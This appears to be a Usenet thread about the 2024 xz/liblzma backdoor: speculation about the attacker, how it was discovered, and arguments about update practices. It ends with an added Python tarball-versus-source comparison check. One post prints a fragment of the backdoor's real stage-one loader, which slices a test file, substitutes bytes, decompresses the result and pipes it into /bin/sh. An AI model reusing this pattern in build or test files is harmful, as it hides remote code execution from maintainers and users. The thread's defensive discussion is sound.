Can someone explain how this happened?
https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
Was it an insider who did it, or an outsider (China perhaps, for example)?
"Indira" <indira@ghandi.net> wrote
| Can someone explain how this happened?
|
| https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
|
| Was it an insider who did it, or an outsider (China perhaps, for example)?
It appears that no one really knows: https://news.ycombinator.com/item?id=39865810
It shouldn't be surprising. It's a massive web of constantly
changing software, overseen by a massive boys' club of geeks,
constantly forcing dripfeed updates onto Linux installs. As the
saying goes, "What could go wrong?"
The pattern is endemic to Linux culture: The OS itself is
an ongoing project and social adhesive -- forever a work in
progress and never a finished, smooth, thoroughly tested
product. My install of OpenSuse would be downloading
hundreds of micro-updates per week if I didn't stop it. I
never chose any setting telling it to function as unsupervised
spyware, constantly calling home for updates. The
whole approach is a ridiculous mess. How could quality control
possibly be carried out on so many constant changes? Linux
is perennial beta software. Worse, loyalty to beta as a norm
is expected in Linux culture.
On Sun, 31 Mar 2024 10:50:58 +0530, Indira wrote:
Can someone explain how this happened?
https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
Was it an insider who did it, or an outsider (China perhaps, for example)?
Summary based on my reading of various posts and emails (not guaranteed
to be complete, or completely current/accurate)
Bad actor weasels their way into the xz/liblzma project (the owner/maintainer of the project seems to be an overworked one-man band, and while the project is peripheral to major systems, it is still part of the necessary infrastructure).
Bad actor builds up enough good will to be named as a co-maintainer of the project.
Bad actor gradually (over the course of a couple of years) checks in various patches that, under a seemingly complex set of build requirements (x86 Linux, Debian or Red Hat derivative with systemd, etc.), cause liblzma code to manipulate
the internals of sshd to backpatch it with an RCE backdoor.
The bad actor used a vaguely Chinese name, and hid behind a VPN with a public endpoint in (IIRC) Singapore. BUT, there's no obvious way to tie such an anonymous
actor to a specific country; names can be assumed, VPNs can disguise locations,
and the email address was a generic Gmail address available worldwide.
As for the discovery: a PostgreSQL developer was performing some tuning, and found a half-second discrepancy in how long it took sshd to authenticate connections. Much deep diving with profiling tools later, the developer tracked
down the delay and found all the mess that the bad actor installed.
The developer reported it to various interested parties two days ago, and the story unfolded from there.
"J.O. Aho" <user@example.net> wrote
| > The
| > whole approach is a ridiculous mess. How could quality control
| > possibly be carried out on so many constant changes?
|
| Quite simple, most open source projects can get free static code
| inspection (this can be automated say when a pull request is made), a
| review is always needed before code are merged (how good it is depends
| on the maintainers, all from sloppy microsoft standard to BSD high
| standard) . This is the same way as most closed source projects also are
| done.
|
I don't see it as a closed vs open issue. Microsoft
now do the same dripfeed updating. Essentially, the
SOHo customer base are now an unpaid beta testing
army.
I've had to make efforts to block these unknown updates
in both Win10 and Suse. (And yes, it is in the 100s. I had
my firewall down briefly after a week or two when Suse couldn't
call home. It told me I had 360 updates waiting. What are
they? Who knows. Most of the names are not informative, even
if I wanted to look through 360 updates. It's nuts. I didn't
agree to be a beta testing volunteer for programmers who
can't stop fiddling. I'm guessing they may spend more time
rebuilding the install package than actually writing the software.)
The way it used to work is that software was thoroughly
tested before release. Then another version might come out
in maybe a year. At that point people might try it out, or they
might wait for reviews. And one could easily find a list of
actual changes in the new version. Most of my Windows software
hasn't been updated in ages and still works fine. But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
Apple is a different thing. They serve a consumer-only audience,
updating periodically with stable releases and quickly dropping
support for older products. Their aim is to sell a lot of very
dependable devices to a tech-illiterate customer base, which is
a different business model.
If someone screws up and needs to issue a fix, that's fine.
But it shouldn't happen very often. An OS on a computer that's
actually in use shouldn't be getting dripfeed updates. It should
be getting updates rarely and then with good reason. MS know that.
That's why they let corporate customers update periodically and
test out the changes before rolling them out.
Bad actor probably paid by some country or mafia with money and resources.
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw--lzma1 -dc|/bin/sh
On Sun, 31 Mar 2024 10:50:58 +0530, Indira wrote:
Was it an insider who did it, or an outsider (China perhaps, for example)?
Who did it?
Your mum. Just kidding, it was GCHQ in Cheltenham. Just kidding, it was
Russia. Just kidding, it was China. Just kidding, it was America. Just kidding, it was definitely your mum.
How advanced was the threat actor?
The backdoor attempt was a very serious one, with a very high bar of knowledge, research, development and tradecraft to reach this far into the Linux ecosystem. Additionally, changes made by the threat actor on Github span multiple years,
and include things like introducing functions
incompatible with OSS Fuzzer due to outstanding small issues since 2015,
then getting OSS Fuzzer to exclude XZ Utils from scanning last year. The backdoor itself is super well put together, and even includes the ability
to remotely deactivate and remove the backdoor via a kill command.
https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd
"Carlos E.R." <robin_listas@es.invalid> wrote
| > The way it used to work is that software was thoroughly
| > tested before release. Then another version might come out
| > in maybe a year. At that point people might try it out, or they
| > might wait for reviews. And one could easily find a list of
| > actual changes in the new version. Most of my Windows software
| > hasn't been updated in ages and still works fine. But Microsoft and
| > Linux are now both guilty of seat-of-the-pants updating. If it
| > isn't stopped, Windows will show a message at boot every few
| > days: "Please wait. Installing updates."
|
| You should read "The cathedral and the bazaar".
|
That's addressing how to develop software. But then there's
the point at which the software is done, thoroughly tested,
and put to use. It needs to be well designed and stable. It
needs to do what people need. Then it needs to stay put.
Software shouldn't be a sexy business, with constant redesign.
What happens more often than not in the Linux world might
be called the greasemonkey syndrome. That's the case where
someone has a car on his front lawn and continually works
on tuning it up, adding scoops, and so on. He never quite gets
around to driving the car. He just likes to tinker.
For all Microsoft's faults, there's the advantage that their business depends on business users. So Windows has to be stable, it has to
have a well documented API, and backward compatibility is critical
because businesses build their own inhouse software. I can write
software today on Windows that runs on every Windows machine in
the world, with no support files needed. With Macs one gets 2-3
years backward compatibility. With Linux it's a moving target. I'm
still using a 25 year old Paint Shop Pro on my 23 year old WinXP.
I'm still using current Firefox on 14 year old Win7. I had to update
my 4 year old Raspberry Pi OS because it couldn't run the latest
Chromium. It could only run Chromium 92, released in 2021. The
whole thing has to be periodically replaced.
"Carlos E.R." <robin_listas@es.invalid> wrote:
Bad actor probably paid by some country or mafia with money and resources.
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
On 31/03/2024 20.17, Newyana2 wrote:
"J.O. Aho" <user@example.net> wrote
| > The
| > whole approach is a ridiculous mess. How could quality control
| > possibly be carried out on so many constant changes?
|
| Quite simple, most open source projects can get free static code
| inspection (this can be automated say when a pull request is made), a
| review is always needed before code are merged (how good it is depends
| on the maintainers, all from sloppy microsoft standard to BSD high
| standard) . This is the same way as most closed source projects also
are
| done.
|
I don't see it as a closed vs open issue. Microsoft
now do the same dripfeed updating. Essentially, the
SOHo customer base are now an unpaid beta testing
army.
That was the feeling one got reading it: bashing on the open source development model, which in reality isn't that much different from remote working setups, with the exception that the developers haven't gone through a silly
interview.
I've had to make efforts to block these unknown updates
in both Win10 and Suse.
In microsoft updates you can't opt out from specific updates, everything
is bundled together, while for example with Suse you can block specific packages from being updated (in the long run you may get a dependency
issue, not my problem).
(And yes, it is in the 100s. I had
my firewall down briefly after a week or two when Suse couldn't
call home.
What you call "calling home" for Suse is just a fetch of the latest
status on what packages exist in the remote repository and some
metadata, so it's one-way communication; sure, the remote end could store your IP and which repository you were fetching from.
It's on your local system that the calculation is done of which packages
need to be installed to get everything up to the latest version.
This differs much from the Microsoft way, where you tell everything to Microsoft and they tell you what to install.
Please don't be stupid, keep your stuff up to date, it's not about you,
but it's about everyone else as when you are part of a botnet everyone
else will be affected of your bad decisions.
"J.O. Aho" <user@example.net> wrote
| Please don't be stupid, keep your stuff up to date, it's not about you,
| but it's about everyone else as when you are part of a botnet everyone
| else will be affected of your bad decisions.
|
Now that you mention it, that sounds like good advice.
I am too stupid to manage security on my computer. I'm
not even a Linux engineer. So I'll do as you recommend.
I think my compression libs are out of date and I've heard
there's a nifty one called "xz". Maybe I'll get that. When do
you advise me to update it again? This afternoon? Or is
tonight good enough? :)
"Carlos E.R." <robin_listas@es.invalid> wrote
| > That's addressing how to develop software. But then there's
| > the point at which the software is done, thoroughly tested,
| > and put to use. It needs to be well designed and stable. It
| > needs to do what people need. Then it needs to stay put.
|
| Software is never done.
|
The normalization of that view is what's led to the acceptance
of a seat-of-the-pants rolling beta approach. Your statement
has no context. A lot of software is more than done. If the
software does what you need and it's stable, why would you
dump it for something else?
of it is 25 years old. It works dependably. It doesn't need
security patches.
J.O. makes a valid case for security with software that goes online.
OK. (Even though that's rather ironic in this particular thread.)
But security isn't just a matter of putting fingers in the dike once
a week. It's about making a solid product in the first place and
then dealing with risk.
For instance, Firefox updates about every 10 days. Why?
Newyana2 <Newyana2@invalid.nospam> wrote:
[...]
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
With "every few days" actually being *a month* and you only get a
"Please wait." message if you're stupid enough not to set your 'Active hours'.
And "at boot every few days"!? My system is up from one monthly update cycle to the next, no silly business with booting in between.
[...]
On 3/31/2024 2:11 PM, Lew Pitcher wrote:[snip]
Vegard Nossum wrote a script to detect if it's likely that the ssh binary on a system is vulnerable, attached here. Thanks!
Greetings,
Andres Freund
View attachment "injected.txt" of type "text/plain" (8236 bytes)
Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" (36487 bytes)
Download attachment "detect.sh" of type "application/x-sh" (426 bytes)
On 31/03/2024 19:17, Newyana2 wrote:[...]
quickly dropping
support for older products.
Which from a security standpoint works very well. Apple long ago stopped selling OS updates - which Microsoft still kinda does - as it made sense
to have as many users as possible on the latest and most up-to-date OS version.
Charging for updates means users won't update in a timely manner and
that leaves MS with the headache of having to support multiple versions concurrently which is expensive and inefficient.
["Followup-To:" header set to alt.os.linux.]
Frank Slootweg <this@ddress.is.invalid> wrote at 18:57 this Sunday (GMT):
Newyana2 <Newyana2@invalid.nospam> wrote:
[...]
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
With "every few days" actually being *a month* and you only get a
"Please wait." message if you're stupid enough not to set your 'Active hours'.
And "at boot every few days"!? My system is up from one monthly update cycle to the next, no silly business with booting in between.
[...]
I think I've heard of Windows ignoring that sometimes.
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
["Followup-To:" header set to alt.os.linux.]
Ignored, because this is about Windows. (Not to mention that
'Followup-To:' is nearly always inappropriate.)
Frank Slootweg <this@ddress.is.invalid> wrote at 18:57 this Sunday (GMT):
Newyana2 <Newyana2@invalid.nospam> wrote:
[...]
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
With "every few days" actually being *a month* and you only get a
"Please wait." message if you're stupid enough not to set your 'Active
hours'.
And "at boot every few days"!? My system is up from one monthly update cycle to the next, no silly business with booting in between.
[...]
I think I've heard of Windows ignoring that sometimes.
I think you've heard wrong. Never happened to me (for two systems,
Windows 10 and 11) and I can't think of a scenario where it (your set
'Active hours') could be ignored.
You also can set Windows Update to pause for 1, 2, 3, 4 or 5 weeks and
you can reset that pause before it runs out, so you can pause
indefinitely.
Bad actor probably paid by some country or mafia with money and resources.
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
Wrong. The source code of xz was compromised.
Chris <ithinkiam@gmail.com> wrote:
On 31/03/2024 19:17, Newyana2 wrote:[...]
[About Apple:]
quickly dropping
support for older products.
Which from a security standpoint works very well. Apple long ago stopped
selling OS updates - which Microsoft still kinda does - as it made sense
to have as many users as possible on the latest and most up-to-date OS
version.
Maybe you can still buy some Microsoft Windows upgrades for some niche corner cases, but effectively all Windows upgrades have been free, ever
since Windows 7 (2009!), till today (Windows 11).
Of course you can still buy full licenses, for systems which come
without one, but those are not upgrades.
Charging for updates means users won't update in a timely manner and
that leaves MS with the headache of having to support multiple versions
concurrently which is expensive and inefficient.
Aside from Microsoft not charging for upgrades or updates, Wikipedia
tells me that Apple also still supports three versions of macOS (12, 13
and 14),
with - I'm sure - their subversions,
while Microsoft supports
two Windows versions (10 and 11), with - to some extent - their
subversions. So I don't think Apple and Microsoft are all that
different in this respect. (Only the number of years spanning those
versions is much shorter for Apple than for Microsoft (less than 3
versus nearly 9).)
Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT):
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
["Followup-To:" header set to alt.os.linux.]
Ignored, because this is about Windows. (Not to mention that 'Followup-To:' is nearly always inappropriate.)
I've been told the opposite..
On 01/04/2024 16:19, Frank Slootweg wrote:
Chris <ithinkiam@gmail.com> wrote:
On 31/03/2024 19:17, Newyana2 wrote:[...]
[About Apple:]
quickly dropping
support for older products.
Which from a security standpoint works very well. Apple long ago stopped selling OS updates - which Microsoft still kinda does - as it made sense to have as many users as possible on the latest and most up-to-date OS
version.
Maybe you can still buy some Microsoft Windows upgrades for some niche corner cases, but effectively all Windows upgrades have been free, ever since Windows 7 (2009!), till today (Windows 11).
I thought the upgrade to 10 from 7/8 was only free for a while? It also certainly wasn't a "transparent" upgrade.
Of course you can still buy full licenses, for systems which come without one, but those are not upgrades.
Although, anyone can use Win10 for free as long as they ignore the
subtle 'nag' from MS. No idea why they still charge so much for Windows. Maybe it's so they can justify the costs to OEMs?
I think the biggest difference is that macOS users quickly transition to
the latest version as it's released: https://www.statista.com/statistics/944559/worldwide-macos-version-market-share/[1]
Whereas windows users like to stick with what they know and Win10 is
still the dominant version with >60% with a mishmash of subversions.
[1] this has highlighted a funny quirk that so many websites can't parse
a macOS user agent version that starts with anything other than 10.x
that ever since the release of macOS 11 all Macs are reporting the same
UA which is frozen at 10.15. https://bugzilla.mozilla.org/show_bug.cgi?id=1679929
when did Gates first call Linux a 'cancer'
badsector writes:
when did Gates first call Linux a 'cancer'
That was Ballmer. He was evidently terrified of Linux.
Chris <ithinkiam@gmail.com> wrote:
On 01/04/2024 16:19, Frank Slootweg wrote:
Chris <ithinkiam@gmail.com> wrote:
On 31/03/2024 19:17, Newyana2 wrote:[...]
[About Apple:]
quickly dropping
support for older products.
Which from a security standpoint works very well. Apple long ago stopped selling OS updates - which Microsoft still kinda does - as it made sense to have as many users as possible on the latest and most up-to-date OS version.
Maybe you can still buy some Microsoft Windows upgrades for some niche
corner cases, but effectively all Windows upgrades have been free, ever
since Windows 7 (2009!), till today (Windows 11).
I thought the upgrade to 10 from 7/8 was only free for a while? It also
certainly wasn't "transparent" upgrade.
Yes, Microsoft has been sending mixed messages about this and there
may have been gaps when the previous free period was over and the next
free period was not yet there. After all, one can't use Microsoft and consistent in one sentence, can one!? :-) Anyway, my wife's 8.1 to 10
upgrade was done in March 2023, nearly 8 years after release of 10, and
was free.
Of course you can still buy full licenses, for systems which come
without one, but those are not upgrades.
Although, anyone can use Win10 for free as long as they ignore the
subtle 'nag' from MS. No idea why they still charge so much for Windows.
Maybe it's so they can justify the costs to OEMs?
I only bought Windows 1.0 (the 386 version), never since.
["Followup-To:" header set to alt.os.linux.]
Larry Wolff <larrywolff@larrywolff.net> wrote at 09:05 this Monday (GMT):
On 3/31/2024 2:11 PM, Lew Pitcher wrote:[snip]
Vegard Nossum wrote a script to detect if it's likely that the ssh binary on a system is vulnerable, attached here. Thanks!
Greetings,
Andres Freund
View attachment "injected.txt" of type "text/plain" (8236 bytes)
Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" (36487 bytes)
Download attachment "detect.sh" of type "application/x-sh" (426 bytes)
Hi, the server I am using strips binaries. Would it be possible to
provide a link?
"J.O. Aho" <user@example.net> wrote
| There is less risk of using the compromised xz tarball than using your
| current ms-windows
You're getting more glib and adversarial with each post.
The risks with Windows depend on a lot of things. As does
the risk with anything. Computers are not hacked by pixies.
They're hacked by people exploiting network communication
methods that are inherently unsafe.
If you don't want to deal with that directly then the best
you can do is to allow the dripfeed updates, run anti-virus,
minimize valuable data that you allow on your computer,
like credit card numbers, and hope that some update doesn't
break your system.
If you're actually going to deal with
security it's more complicated.
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT):
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
["Followup-To:" header set to alt.os.linux.]
Ignored, because this is about Windows. (Not to mention that
'Followup-To:' is nearly always inappropriate.)
I've been told the opposite..
That's another wrong thing you've been told! :-)
I won't go in all the situations where it's wrong, but will just take
this example.
If I had honoured your 'Followup-To:', I would not see any responses,
i.e. also not any responses to *my own* response (which is, as I said,
about Windows, *not* Linux), because I'm not subscribed to alt.os.linux.
So you were effectively forcing me - *and* any other user who is not subscribed to alt.os.linux - to subscribe, just because you think it's
the good thing to do.
I hope you realize how inconsiderate and rude that is.
Also a 'Followup-To: alt.comp.os.windows-10' would have been inappropriate, because you cut off any subscribers of alt.os.linux, who
might be interested in further responses.
Bottom line: Do *not* use 'Followup-To:'.
[...]
On 4/1/2024 10:40 AM, candycanearter07 wrote:
["Followup-To:" header set to alt.os.linux.]
Larry Wolff <larrywolff@larrywolff.net> wrote at 09:05 this Monday (GMT):
On 3/31/2024 2:11 PM, Lew Pitcher wrote:
[snip]
Vegard Nossum wrote a script to detect if it's likely that the ssh binary on a system is vulnerable, attached here. Thanks!
Greetings,
Andres Freund
View attachment "injected.txt" of type "text/plain" (8236 bytes)
Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" (36487 bytes)
Download attachment "detect.sh" of type "application/x-sh" (426 bytes)
Hi, the server I am using strips binaries. Would it be possible to
provide a link?
Maybe the confusing stuff you were reading, was referring
to attachments on a page like this ?
https://seclists.org/oss-sec/2024/q1/301
For example, check out the attachments at the bottom of this message.
https://seclists.org/oss-sec/2024/q1/268
Paul
I've used Windows off and on since 3.1 which came with my first PC, but
only ever bought Win10. I used a pirate version of win98 for a long time
and then linux until I made a gaming rig.
I think my next home computer will be a mac. I'll consider this when win10 goes out of support next year.
"J.O. Aho" <user@example.net> wrote
| There is less risk of using the compromised xz tarball than using your
| current ms-windows
You're getting more glib and adversarial with each post.
The risks with Windows depend on a lot of things. As does
the risk with anything. Computers are not hacked by pixies.
They're hacked by people exploiting network communication
methods that are inherently unsafe.
If you don't want to deal with that directly then the best
you can do is to allow the dripfeed updates, run anti-virus,
minimize valuable data that you allow on your computer,
like credit card numbers, and hope that some update doesn't
break your system. If you're actually going to deal with
security it's more complicated.
On 4/2/2024 2:57 AM, Chris wrote:
I've used Windows off and on since 3.1 which came with my first PC, but
only ever bought Win10. I used a pirate version of win98 for a long time
and then linux until I made a gaming rig.
I think my next home computer will be a mac. I'll consider this when win10 goes out of support next year.
How horrible :-) Sorry for your loss.
I have three Macs in the computer room.
But, I got off the treadmill, I went cold and sober.
And here I am today :-)
I can't go into an Apple Bar, for fear of falling off the wagon.
The Apple computers are important. Other computers
are piled on top of them, and they make "great bases"
for computer stacks :-)
Now, what I want, is a computer with a single 40Gbit/sec connector,
when I'm trying to connect... a keyboard. That's my idea of convenience.
Paul
"Paul" <nospam@needed.invalid> wrote
| Both ecosystems have had supply chain attacks. There
| was also an attack carried out by a local university, for
| which Linus assigned a "permaban" on their kernel submissions.
| That was an attack on kernel.org . Whereas the XZ one is
| a more general Linux one, a test of how well the system
| responds to shenanigans.
|
| Windows 11 shows an "Extract from" if I highlight an XZ file.
| It would appear the Insider development, is already in
| the Release stream. All my instances of XZ are .tar.xz .
|
You have XZ files on Windows?
...To my mind this is all a classic case of placing the blame in the
wrong place. Clearly it's a problem if someone comes up with a hack
of remote access software. But the real problem is that software
itself. Something like SSH shouldn't be in use. Remote Desktop shouldn't be in use. People just can't even imagine using a computer safely.
Some years ago my starving artist brother called me. He was in a
panic, explaining that "Microsoft" had called him to warn that there
could be repercussions because my brother had not paid his Windows
bill for several years.
"Carlos E.R." <robin_listas@es.invalid> wrote:
Bad actor probably paid by some country or mafia with money and resources.
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
On Mon, 1 Apr 2024 15:20:35 +0200, Carlos E.R. wrote:
Bad actor probably paid by some country or mafia with money and resources.
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
Wrong. The source code of xz was compromised.
Read that reference again, and read the other references. https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
It was sneaky. Very sneaky.
It wasn't in the source code.
It was in the packaging/testing code. https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd
"The upstream xz repository and the xz tarballs have been backdoored."
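The point the posters above are circling is that the payload was shipped in the release tarballs' build/test scaffolding rather than in the checked-in source tree, so one defender's check is to diff a release tarball against a source checkout file by file. This is an added example, not code from the thread or from the xz project; the project name, file names and file contents in demo() are constructed for illustration.

```python
import hashlib
import os
import shutil
import tarfile
import tempfile


def _tree_hashes(root):
    """Map relative path -> sha256 hex digest for every regular file under root."""
    hashes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                hashes[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return hashes


def compare_tarball_to_source(tarball_path, source_dir):
    """Diff a release tarball against a source checkout; returns three sorted path lists."""
    # Files only in the tarball, or differing from the checkout, are the release-time
    # build/test scaffolding where the xz payload hid, so those are the ones to inspect.
    with tempfile.TemporaryDirectory() as extracted:
        with tarfile.open(tarball_path) as tar:
            members = tar.getmembers()
            if any(m.name.startswith("/") or ".." in m.name.split("/") for m in members):
                raise ValueError("tarball has path-escaping member names; not extracting")
            tar.extractall(extracted, members=members)
        top = os.listdir(extracted)
        # release tarballs normally wrap everything in a single top-level directory
        root = os.path.join(extracted, top[0]) if len(top) == 1 else extracted
        tar_hashes = _tree_hashes(root)
    src_hashes = _tree_hashes(source_dir)
    return {
        "only_in_tarball": sorted(set(tar_hashes) - set(src_hashes)),
        "only_in_source": sorted(set(src_hashes) - set(tar_hashes)),
        "modified": sorted(p for p in tar_hashes if p in src_hashes and tar_hashes[p] != src_hashes[p]),
    }


def demo():
    """Constructed sample (not the real xz files): a checkout vs. a tarball with two release-only edits."""
    with tempfile.TemporaryDirectory() as work:
        src, rel = os.path.join(work, "checkout"), os.path.join(work, "project-1.0")
        os.makedirs(os.path.join(src, "m4"))
        for path, text in (("configure.ac", "AC_INIT\n"), ("m4/real.m4", "dnl ok\n")):
            with open(os.path.join(src, path), "w") as fh:
                fh.write(text)
        shutil.copytree(src, rel)  # the release tree starts as an exact copy of the checkout
        for path, text in (("m4/real.m4", "dnl tampered\n"), ("m4/extra-macro.m4", "dnl tarball only\n")):
            with open(os.path.join(rel, path), "a") as fh:  # append modifies one file, creates the other
                fh.write(text)
        tarball = os.path.join(work, "project-1.0.tar.gz")
        with tarfile.open(tarball, "w:gz") as tar:
            tar.add(rel, arcname="project-1.0")
        return compare_tarball_to_source(tarball, src)
```

tarfile.open() auto-detects compression, so the same function works on the .tar.xz release files mentioned in the thread.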